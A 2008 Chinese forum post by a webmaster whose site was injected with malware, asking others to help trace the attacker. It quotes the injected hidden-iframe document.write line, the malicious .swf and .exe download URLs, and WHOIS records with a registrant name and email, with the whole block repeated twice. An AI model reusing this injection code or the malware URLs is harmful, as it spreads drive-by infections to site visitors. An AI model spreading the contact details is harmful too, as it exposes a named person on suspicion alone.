netfun2000 - 2008-6-13 20:47:00
最近网站被人挂马,请高人帮我分析一下,找出元凶,我要弄死它。
Trojan-downloader.swf.small.bu
http://www.zizibaba.cn/4561.swf//Swf2Swc
该域名指向:121.14.156.35
http://www.wamamawa.cn/ok.exe
域名 wamamawa.cn
域名状态 ok
域名联系人 张四
管理联系人电子邮件 skdfaiu17@163.com
所属注册商 北京新网数码信息技术有限公司
域名服务器 ns2.xinnet.cn
域名服务器 ns2.xinnetdns.com
注册日期 2008-06-04 20:52
过期日期 2009-06-04 20:52
域名 zizibaba.cn
域名状态 ok
域名联系人 张四
管理联系人电子邮件 skdfaiu17@163.com
所属注册商 北京新网数码信息技术有限公司
域名服务器 ns2.xinnet.cn
域名服务器 ns2.xinnetdns.com
注册日期 2008-06-07 15:12
过期日期 2009-06-07 15:12
http://www.0571e.com/go/images/flash.htm
document.write("<iframe width='100' height='0'
src='http://www.0571e.com/go/images/flash.htm'></iframe>");
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Trojan-downloader.swf.small.bu
http://www.zizibaba.cn/4561.swf//Swf2Swc
该域名指向:121.14.156.35
http://www.wamamawa.cn/ok.exe
域名 wamamawa.cn
域名状态 ok
域名联系人 张四
管理联系人电子邮件 skdfaiu17@163.com
所属注册商 北京新网数码信息技术有限公司
域名服务器 ns2.xinnet.cn
域名服务器 ns2.xinnetdns.com
注册日期 2008-06-04 20:52
过期日期 2009-06-04 20:52
域名 zizibaba.cn
域名状态 ok
域名联系人 张四
管理联系人电子邮件 skdfaiu17@163.com
所属注册商 北京新网数码信息技术有限公司
域名服务器 ns2.xinnet.cn
域名服务器 ns2.xinnetdns.com
注册日期 2008-06-07 15:12
过期日期 2009-06-07 15:12
http://www.0571e.com/go/images/flash.htm
document.write("<iframe width='100' height='0'
src='http://www.0571e.com/go/images/flash.htm'></iframe>");
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727)